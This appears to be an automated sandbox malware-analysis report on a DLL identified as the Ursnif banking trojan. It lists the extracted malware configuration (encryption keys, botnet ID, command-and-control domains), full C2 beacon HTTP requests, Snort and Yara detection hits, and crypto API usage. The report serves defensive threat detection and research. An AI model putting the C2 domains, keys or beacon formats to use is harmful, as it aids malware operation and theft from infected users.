Windows Analysis Report 2u2mgtylJy.dll

AV Detection:

Found malware configuration

Source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Antivirus detection for URL or domain

Source: http://init.icecreambob.com/c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng	Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN	Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6	Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK	Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT	Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF	Avira URL Cloud: Label: malware

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_00F33FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_032E3FAB

Compliance:

Uses 32bit PE files

Source: 2u2mgtylJy.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: 2u2mgtylJy.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source:	Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: 2u2mgtylJy.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49765 -> 194.147.86.221:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: init.icecreambob.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 194.147.86.221 80			Jump to behavior

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NETRACK-ASRU NETRACK-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com

URLs found in memory or binary data

Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000010.00000003.470111978.00000225DF294000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: init.icecreambob.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic	HTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
